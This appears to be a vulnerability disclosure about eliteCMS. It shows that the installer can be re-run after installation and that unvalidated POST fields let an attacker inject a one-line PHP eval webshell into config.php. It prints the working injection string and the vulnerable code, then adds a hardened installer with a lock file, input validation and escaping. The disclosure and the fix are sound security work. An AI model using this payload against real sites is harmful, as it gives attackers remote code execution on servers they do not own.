eliteCMS: installer not locked after installation + one-line webshell write vulnerability

Posted on 2012-11-18 13:59:27
eliteCMS's installer is not locked after installation finishes, so an attacker can re-run the installation simply by visiting the installer's URL!

Another vulnerability is that the installer can write a one-line webshell directly into admin/includes/config.php.
Let's look at the code:

...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
... omitted ...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "        die(\"Database connection failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "        die(\"Database select failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "?>\n";

    $writer = fopen($file, 'w');
...
Now look at this code:

$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];

The values are taken without any validation.
If the database name POST field is set to:

"?><?php eval($_POST[c]);?><?php

a one-line backdoor is written into /admin/includes/config.php.
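A hardened replacement for the step-4 writer, added here as an example (it is not eliteCMS code): it refuses to run once an install lock exists, validates the POST values against allowlists, and serializes them with var_export() so a value containing a double quote or ?> stays inside a string literal instead of becoming PHP code. The lock-file name install.lock, the helper installer_value() and the validation patterns are assumptions made for this example.

```php
<?php
// Added example (not eliteCMS code): a hardened replacement for the step-4 config writer.
// Assumed names: install.lock marks a finished installation; installer_value() is a helper
// defined here; the config path mirrors the one in the original installer.
define('CONFIG_FILE', __DIR__ . '/../admin/includes/config.php');
define('LOCK_FILE',   __DIR__ . '/install.lock');

// 1. Refuse to run the installer again once it has completed.
if (file_exists(LOCK_FILE)) {
    http_response_code(403);
    exit('Installation already completed; delete install.lock to reinstall.');
}

// 2. Validate POST values before they go anywhere near a PHP file. Host, database and
//    user names get a strict allowlist; the password may contain anything because
//    var_export() below escapes it.
function installer_value(string $key, ?string $pattern = null): string
{
    $value = isset($_POST[$key]) ? (string) $_POST[$key] : '';
    if ($pattern !== null && !preg_match($pattern, $value)) {
        http_response_code(400);
        exit('Invalid value for ' . $key);
    }
    return $value;
}

$settings = [
    'DB_SERVER' => installer_value('DB_SERVER', '/^[A-Za-z0-9.\-]{1,253}(:\d{1,5})?$/'),
    'DB_NAME'   => installer_value('DB_NAME',   '/^[A-Za-z0-9_]{1,64}$/'),
    'DB_USER'   => installer_value('DB_USER',   '/^[A-Za-z0-9_]{1,32}$/'),
    'DB_PASS'   => installer_value('DB_PASS'),
];

// 3. Serialize each value with var_export(): it yields a single-quoted PHP string literal
//    with backslashes and quotes escaped, so a "?><?php ... payload never leaves the string.
$out = "<?php\n";
foreach ($settings as $name => $value) {
    $out .= 'define(' . var_export($name, true) . ', ' . var_export($value, true) . ");\n";
}
// No closing ?> tag: nothing after it can leak into the HTTP response.

// 4. Write the file atomically, then lock the installer.
$tmp = CONFIG_FILE . '.tmp';
if (file_put_contents($tmp, $out, LOCK_EX) === false || !rename($tmp, CONFIG_FILE)) {
    exit('Could not write configuration file');
}
touch(LOCK_FILE);
```

With this writer the sample value from the post is rejected by the DB_NAME allowlist, and even a value that passed validation would land in config.php as an escaped string constant rather than executable code.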